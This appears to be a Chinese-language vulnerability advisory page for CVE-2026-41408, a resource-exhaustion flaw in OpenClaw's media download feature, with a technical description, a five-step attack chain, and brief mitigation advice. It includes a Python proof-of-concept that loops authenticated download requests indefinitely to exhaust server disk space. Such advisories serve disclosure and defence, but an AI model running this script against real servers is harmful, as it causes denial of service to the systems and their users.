CVE-2026-41408 CVSS 4.3 中危

CVE-2026-41408 OpenClaw资源耗尽漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41408

漏洞类型

资源耗尽

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026年3月31日之前的版本中存在一个资源耗尽漏洞。由于媒体下载功能未能正确执行核心安全限制，导致文件大小、数量及清理操作的检查机制失效。攻击者可利用此漏洞绕过安全限制，无限制地下载媒体文件，导致服务器磁盘空间被耗尽，从而对系统可用性造成严重影响。该漏洞CVSS评分为4.3，属于中危级别，攻击者仅需低权限即可发起攻击。

技术细节

该漏洞的根本原因在于OpenClaw媒体下载模块缺乏对系统资源消耗的有效校验。正常情况下，应用程序应限制单个文件大小、并发下载数量以及自动清理临时文件。然而，受影响版本中的代码逻辑允许攻击者绕过这些核心限制。攻击者可以通过发送特制的HTTP请求，持续触发大文件的下载操作。由于缺乏有效的计数器和清理机制，这些文件会持续写入磁盘而不会被删除。随着攻击的持续，磁盘存储空间将被恶意数据填满，导致操作系统或应用程序无法写入必要的日志、数据或临时文件，最终引发拒绝服务（DoS）状态，破坏系统可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标服务器运行的是OpenClaw软件，且版本低于2026.3.31。

STEP 2

2. 获取低权限账号

根据CVSS向量PR:L，攻击者获取一个低权限的用户账户凭证。

STEP 3

3. 发起攻击

攻击者利用该账户发送大量媒体下载请求，利用漏洞绕过文件大小和数量限制。

STEP 4

4. 资源耗尽

服务器持续写入磁盘空间且不执行清理，导致磁盘可用空间归零。

STEP 5

5. 拒绝服务

系统因无法写入日志或数据而崩溃或停止服务，导致可用性丧失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-openclaw-instance/api/media/download"

# Attacker's session (requires low privileges as per PR:L)
session = requests.Session()
session.auth = ('low_priv_user', 'password')

headers = {
    "User-Agent": "CVE-2026-41408-POC"
}

try:
    print("[+] Starting resource exhaustion attack...")
    while True:
        # Request a large media file or loop download
        # The vulnerability bypasses size/count limits
        response = session.get(target_url, headers=headers, stream=True)
        
        if response.status_code == 200:
            print(f"[+] Download initiated. Status: {response.status_code}")
            # Do not save to disk locally to avoid crashing the attacker's machine,
            # just consume the stream to keep the connection open and server busy.
            for chunk in response.iter_content(chunk_size=1024):
                pass 
        else:
            print("[-] Attack failed or server down")
            break
except KeyboardInterrupt:
    print("[!] Stopped by user")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议管理员在防火墙或WAF层面限制单个IP的下载请求数量，并密切监控服务器磁盘使用率。一旦发现异常增长，自动阻断相关下载请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表